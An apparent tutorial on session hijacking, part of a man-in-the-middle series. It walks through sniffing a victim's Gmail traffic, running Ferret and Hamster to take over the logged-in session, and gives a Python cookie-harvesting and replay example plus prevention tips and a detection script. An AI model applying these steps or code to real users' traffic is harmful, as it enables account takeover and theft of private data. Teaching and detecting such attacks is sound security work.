Understanding Man-in-the-Middle Attacks - Session Hijacking

In this section, I will show you how session hijacking works, covering the theory behind it, how the attack is carried out in practice, and how to detect and prevent it.


  1. Learn about Man-in-the-Middle attacks - ARP Cache spoofing
  2. Learn about Man-in-the-Middle attacks - DNS spoofing

In the first two parts of this series on man-in-the-middle attacks, we introduced ARP cache spoofing and DNS spoofing. As those examples showed, MITM attacks are very effective and very hard to detect. In this third part I will cover a different attack, session hijacking. As in the previous two parts, we will go over some theory, how the attack is performed, and how to detect and prevent it.

Session Hijacking

The term session hijacking covers a family of different attacks. In general, any attack that exploits a session between two devices counts as session hijacking. By session we mean a stateful connection between devices: state is established when the connection is first set up, maintained while the connection lasts, and torn down by some explicit process that ends it. Stated this abstractly the idea is a bit confusing, so let's look at a session in more concrete terms.

In this article I will talk about session hijacking against HTTP sessions. Websites that require you to log in are good examples of session-oriented connections. You authenticate to the site with a username and password to establish the session; the site then maintains some form of session token (usually a cookie) to confirm that you are still logged in and allowed to access resources; and when you log out, that token is invalidated and the session ends. This is one specific example, but although we do not always notice them, sessions are everywhere, and most communication relies on some form of session or other stateful behaviour.

Figure 1: A normal session

As we have seen in the previous attacks, nothing that crosses the network is safe, and session data is no different. The principle behind most forms of session hijacking is that if you can intercept the pieces of data used to establish a session, you can use that data to impersonate one of the parties to the conversation and gain access to the session. In the example above, this means that if we capture the cookie used to maintain session state between your browser and the website you are logged into, we can send that cookie to the web server ourselves and take over your connection. From an attacker's point of view, this is very attractive.

Figure 2: Hijacking the session

Now that we have a bit of theory, let's go into a practical example.

Stealing Cookies with Hamster and Ferret

In our practical scenario, we will perform a session hijacking attack by intercepting the traffic of a user who is logged into his Gmail account. Using that intercepted traffic, we will impersonate the user and access his account from our attacking machine.

To carry out this attack we will use two tools called Hamster and Ferret. You can download both of them from http://hamster.erratasec.com/.

Alternatively, you can download and use BackTrack 4. BT4 is a Linux live-CD distribution designed specifically for hacking and penetration testing, with a large set of tools pre-compiled and pre-installed; Hamster and Ferret are two of them. You can download BT4 from http://www.backtrack-linux.org/. Once booted, you will find Hamster in the directory /pentest/sniffers/hamster. The screenshots in the rest of this tutorial were taken on BT4.

The first step in this session hijack is capturing the victim's traffic while he browses Gmail. This traffic can be captured by any sniffing application, such as tcpdump or Wireshark, but to see the right packets on a switched network you will need a technique such as ARP cache spoofing, which was introduced in the first part of this series.

Figure 3: Capturing the traffic of a user browsing Gmail

Once you have captured the victim's traffic while he browses Gmail, save the capture file into the Hamster directory. For this example we named the file victim_gmail.pcap. With the file in place, use Ferret to process it: change into the Hamster directory and run ferret -r victim_gmail.pcap. Ferret parses the capture and writes a hamster.txt file that Hamster uses to hijack sessions.

Figure 4: Processing the capture file with Ferret

With the intercepted HTTP data prepared, we can use Hamster to carry out the attack. Hamster works as a proxy that provides a browser interface for viewing and using the stolen session cookies. To start the Hamster proxy, simply run hamster with no command-line options.

Figure 5: Launching Hamster

Once Hamster is running, open your browser and configure its proxy settings to match those printed in Hamster's output. By default this means pointing the proxy at the loopback address 127.0.0.1 on port 1234. In Internet Explorer these settings are under Tools, Internet Options, Connections, LAN Settings; tick the 'Use a proxy server for your LAN' checkbox and enter the address and port.

Figure 6: Configuring the browser proxy settings for use with Hamster

With the proxy settings in effect, you can reach the Hamster console by browsing to http://hamster. Hamster reads the file produced by Ferret, builds a list of the IP addresses whose session information was intercepted, and displays those addresses in the right-hand pane of the browser. The file we created contains only a single victim IP address; clicking it populates the left-hand pane with the sessions available for hijacking.

Figure 7: The Hamster GUI

We should see the victim's Gmail session listed there; clicking that link opens a new window that is logged into the victim's Gmail account!

Figure 8: Successful hijack of a Gmail account
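To make the mechanism concrete, here is an added example (not part of the original article, and not Hamster or Ferret code) that does in a few dozen lines of Python what the two tools do in the procedure above: the Ferret-like part pulls Cookie headers out of captured HTTP requests and groups them by client IP and host, and the Hamster-like part rebuilds a request carrying the stolen cookies so the attacker's browser can replay them. The captured requests, hostnames and cookie values are constructed for the example. Note that this only works for cookies sent in cleartext; a cookie carried over HTTPS (or marked Secure so the browser never sends it over plain HTTP) is not visible to the sniffer, which is the real fix for the attack shown here.

```python
"""Added example, not from the article and not Hamster/Ferret code: a minimal
sidejacking toolkit. harvest_sessions() plays the Ferret role (extract cookies
from captured requests), build_replay_request() plays the Hamster role (replay
them as the victim). All sample data below is constructed."""

# Constructed sample capture: (client_ip, raw HTTP request) as a sniffer would hand
# them over after TCP reassembly. Hostnames and cookie values are invented.
CAPTURED_REQUESTS = [
    ("192.168.1.23", b"GET /mail/ HTTP/1.1\r\nHost: mail.example.com\r\n"
                     b"Cookie: SID=abc123; HSID=def456\r\nUser-Agent: Mozilla/5.0\r\n\r\n"),
    ("192.168.1.23", b"GET /mail/inbox HTTP/1.1\r\nHost: mail.example.com\r\n"
                     b"Cookie: SID=abc123; HSID=def456; PREF=lang%3Den\r\n\r\n"),
    # no Cookie header: nothing to steal from this request
    ("192.168.1.40", b"GET / HTTP/1.1\r\nHost: www.example.org\r\n\r\n"),
    ("192.168.1.40", b"POST /login HTTP/1.1\r\nHost: shop.example.net\r\n"
                     b"Cookie: PHPSESSID=9f8e7d\r\nContent-Length: 0\r\n\r\n"),
]


def parse_request(raw):
    """Return (method, path, headers) from one raw HTTP/1.x request; header names lowercased."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def parse_cookie_header(value):
    """Split 'a=1; b=2' into a dict, ignoring malformed pairs without '='."""
    cookies = {}
    for part in value.split(";"):
        part = part.strip()
        if "=" in part:
            name, val = part.split("=", 1)
            cookies[name.strip()] = val.strip()
    return cookies


def harvest_sessions(captured):
    """Ferret step: build {client_ip: {host: cookie dict}} from every request seen.

    Later requests overwrite earlier values for the same cookie name, so the
    most recent cookie jar for each victim/host pair wins."""
    jar = {}
    for ip, raw in captured:
        _method, _path, headers = parse_request(raw)
        host = headers.get("host")
        if not host or "cookie" not in headers:
            continue
        jar.setdefault(ip, {}).setdefault(host, {}).update(
            parse_cookie_header(headers["cookie"]))
    return jar


def build_replay_request(host, path, cookies):
    """Hamster step: the request the attacker's browser sends (via the proxy),
    presenting the victim's cookies as if they were its own."""
    cookie_header = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Cookie: {cookie_header}\r\nConnection: close\r\n\r\n").encode("latin-1")


if __name__ == "__main__":
    stolen = harvest_sessions(CAPTURED_REQUESTS)
    for ip, hosts in stolen.items():
        for host, cookies in hosts.items():
            print(f"{ip} -> {host}: {cookies}")
    print(build_replay_request("mail.example.com", "/mail/inbox",
                               stolen["192.168.1.23"]["mail.example.com"]).decode())
```

The output is the same thing Hamster's left-hand pane shows: one entry per victim IP and host, and behind each entry the cookies needed to replay the session. Real tools must also reassemble TCP streams and handle chunked or pipelined requests; this example starts from already reassembled requests to keep the cookie-theft logic itself visible.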

How to Prevent Session Hijacking

Because session hijacking takes several forms, the preventive measures vary with them. Like the other MITM attacks we have looked at, session hijacking is hard to detect and even harder to prevent, because it is mostly a passive attack. Unless the attacker does something conspicuous while using the hijacked session, you may never know the attack is happening. Here are some things you can do to reduce the risk:

  1. Do your online banking at home - The chance of someone intercepting your traffic on a home network is far lower than on a corporate network. This is not because your home computer is inherently more secure, but because there are only one or two machines at home, and you mostly have to worry about session hijacking there if your teenager has started watching hacking videos on YouTube and following along. On a corporate network you have no idea what is happening down the hall or in the branch office 200 miles away, so there are many more potential sources of attack. Be aware that online banking is one of the biggest targets of session hijacking, but the advice applies to everything.
  2. Be aware of the attack - Even sophisticated, seasoned attackers make mistakes and leave traces of their activity. Knowing when and from where you are logged into session-based services can help you spot when someone else is using your session. So it is up to you to keep track of things, for example by checking the last-login time a service reports, to make sure everything is as it should be.
  3. Secure the internal machines - These attacks are usually launched from inside the network. If your network devices and hosts are well secured, an attacker has fewer chances to compromise a host inside your network, and the risk of session hijacking drops accordingly.
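The advice above relies on the user noticing a hijack. The service itself can also watch for one: a replayed cookie shows up on the server as a single session ID being used from two different clients at about the same time. The following added example (not from the article) parses a constructed, pipe-separated access log and flags any session ID that is used from a different IP address or User-Agent within a short time window. The log format, addresses and session IDs are invented for the example.

```python
"""Added example, not from the article: a server-side indicator of a hijacked
session. Flags a session id that is used from a different client (IP or
User-Agent) within `window` seconds of its previous use. Log data is constructed."""
from collections import defaultdict

# Constructed access log: ip|unix_ts|method|path|user_agent|session_id
# (invented format and values, not from any real server).
SAMPLE_LOG = """\
192.168.1.23|1270000000|GET|/mail/|Mozilla/5.0 (Windows NT 6.1)|SID=abc123
192.168.1.23|1270000030|GET|/mail/inbox|Mozilla/5.0 (Windows NT 6.1)|SID=abc123
192.168.1.99|1270000045|GET|/mail/inbox|Mozilla/5.0 (X11; Linux x86_64)|SID=abc123
192.168.1.40|1270000050|GET|/shop/|Mozilla/5.0 (Windows NT 6.1)|SID=zz9
192.168.1.40|1270000090|GET|/shop/cart|Mozilla/5.0 (Windows NT 6.1)|SID=zz9
10.0.0.5|1270007300|GET|/shop/cart|Mozilla/5.0 (Windows NT 6.1)|SID=zz9
"""


def parse_log(text):
    """Turn the pipe-separated log into a list of event dicts; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ip, ts, method, path, ua, sid = line.split("|")
        events.append({"ip": ip, "ts": int(ts), "method": method,
                       "path": path, "ua": ua, "sid": sid})
    return events


def find_hijack_indicators(events, window=300):
    """Return {sid: [(earlier_event, later_event), ...]} for suspicious session reuse.

    Two consecutive uses of the same session id from a different IP or User-Agent,
    no more than `window` seconds apart, are the footprint of a replayed cookie:
    the real user is still active while the attacker is using the session too.
    Sessions with nothing suspicious are absent from the result."""
    by_sid = defaultdict(list)
    for event in events:
        by_sid[event["sid"]].append(event)
    alerts = {}
    for sid, uses in by_sid.items():
        uses.sort(key=lambda e: e["ts"])
        for prev, cur in zip(uses, uses[1:]):
            client_changed = prev["ip"] != cur["ip"] or prev["ua"] != cur["ua"]
            if client_changed and cur["ts"] - prev["ts"] <= window:
                alerts.setdefault(sid, []).append((prev, cur))
    return alerts


if __name__ == "__main__":
    for sid, pairs in find_hijack_indicators(parse_log(SAMPLE_LOG)).items():
        for prev, cur in pairs:
            print(f"{sid}: {prev['ip']} ({prev['ua']}) -> {cur['ip']} ({cur['ua']}) "
                  f"after {cur['ts'] - prev['ts']}s")
```

In the sample, SID=abc123 is flagged because a Linux client on 192.168.1.99 uses it 15 seconds after the Windows victim on 192.168.1.23, which is exactly what the Hamster replay looks like from the server side. SID=zz9 moves to 10.0.0.5 two hours later and is not flagged at the default window; widening the window would catch it, at the cost of more false positives from users who legitimately change networks. An IP change alone is weak evidence (NAT, mobile roaming), so a User-Agent mismatch should weigh more, and an attacker who copies the victim's User-Agent and waits will slip through. This check is a detection aid on top of serving the site over HTTPS with Secure and HttpOnly cookies, not a substitute for it.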

Conclusion

So far we have covered three very dangerous MITM attacks that can have serious consequences when carried out successfully. Keep in mind that with session hijacking, a malicious attacker can gain access to online banking accounts, user email, or even sensitive applications on the internal network. In the next part of this series I will show you another dangerous spoofing-based MITM attack.
